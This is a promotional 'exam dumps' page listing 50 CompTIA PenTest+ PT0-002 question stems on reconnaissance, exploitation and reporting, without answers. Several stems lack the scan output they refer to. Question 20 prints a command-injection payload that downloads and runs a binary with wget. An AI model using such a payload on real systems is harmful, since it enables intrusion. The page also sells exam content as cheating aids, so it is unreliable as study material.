Updated CompTIA PenTest+ PT0-002 Exam Dumps [2022] Pass PT0-002 Exam Smoothly

More and more candidates are choosing PT0-002 exam dumps as preparation materials for the CompTIA PenTest+ certification exam, since they have found that the updated PT0-002 exam dumps from DumpsBase are valid and verified. The most recent PT0-002 exam dumps, which come with the actual dumps questions and precise answers, will help you understand the real PT0-002 CompTIA PenTest+ exam. That means you'll have access to up-to-date study materials, which have been verified by industry experts to ensure that you can pass the CompTIA PenTest+ exam on the first attempt.

Try reading the free CompTIA PenTest+ PT0-002 dumps here first.

1. Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

2. Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

3. A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

Which of the following could be used for a denial-of-service attack on the network segment?

4. An assessment has been completed, and all reports and evidence have been turned over to the client.

Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

5. A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop.

Which of the following can be used to ensure the tester is able to maintain access to the system?

6. A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports.

To further enumerate, the tester ran another scan using the following command:

nmap -O -A -sS -p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered.

Which of the following MOST likely occurred on the second scan?

7. The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

8. Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

9. A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

Which of the following commands would help the tester START this process?

10. Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

11. The results of an Nmap scan are as follows:

Starting Nmap 7.80 (https://nmap.org) at 2021-01-24 01:10 EST

Nmap scan report for (10.2.1.22)

Host is up (0.0102s latency).

Not shown: 998 filtered ports

Port State Service

80/tcp open http

|_http-title: 80F 22% RH 1009.1MB (text/html)

|_http-slowloris-check:

| VULNERABLE:

| Slowloris DoS Attack

| <..>

Device type: bridge|general purpose

Running (JUST GUESSING) : QEMU (95%)

OS CPE: cpe:/a:qemu:qemu

No exact OS matches found for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/.

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Which of the following device types will MOST likely have a similar response? (Choose two.)

12. A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot.

Which of the following techniques would BEST support this objective?

13. DRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

14. A penetration tester wants to scan a target network without being detected by the client’s IDS.

Which of the following scans is MOST likely to avoid detection?

15. Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.

Which of the following best describes the NEXT step in the engagement?

16. A penetration tester recently completed a review of the security of a core network device within a corporate environment.

The key findings are as follows:

• The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

• Network management interfaces are available on the production network.

• An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

17. A penetration tester is working on a scoping document with a new client.

The methodology the client uses includes the following:

• Pre-engagement interaction (scoping and ROE)

• Intelligence gathering (reconnaissance)

• Threat modeling

• Vulnerability analysis

• Exploitation and post exploitation

• Reporting

Which of the following methodologies does the client use?

18. A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

19. A penetration tester has been given eight business hours to gain access to a client’s financial system.

Which of the following techniques will have the highest likelihood of success?

20. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = "POST "

exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"

exploit += "HTTP/1.1"

Which of the following commands should the penetration tester run post-engagement?

21. A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code.

Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

22. A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good.

Which of the following recommendations should the penetration tester include in the report?

23. Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

24. A penetration tester ran the following command on a staging server:

python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

25. Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

26. A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol.

Which of the following methods would be the BEST to accomplish this objective?

27. In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>.

Which of the following would be the best action for the tester to take NEXT with this information?

28. Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

29. An Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

30. Appending string values onto another string is called:

31. A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday.

Which of the following should the security company have acquired BEFORE the start of the assessment?

32. A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository.

After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

33. A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

34. A penetration tester is scanning a corporate lab network for potentially vulnerable services.

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

35. A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.

Which of the following would BEST support this task?

36. A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data.

Which of the following should the tester do with this information to make this a successful exploit?

37. A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines.

Which of the following documents could hold the penetration tester accountable for this action?

38. A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.

Which of the following utilities would BEST support this objective?

39. A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.

Which of the following attack types is MOST concerning to the company?

40. A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.

Which of the following steps should the tester take NEXT?

41. A penetration tester received a .pcap file to look for credentials to use in an engagement.

Which of the following tools should the tester utilize to open and read the .pcap file?

42. A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.

Which of the following are considered passive reconnaissance tools? (Choose two.)

43. A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL

http://172.16.100.10:3000/profile, a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

44. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

45. A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

46. A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache.

Which of the following commands will accomplish this task?

47. A compliance-based penetration test is primarily concerned with:

48. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

49. A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.

Which of the following BEST describes what happened?

50. A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.

Which of the following vulnerabilities has the tester exploited?


 
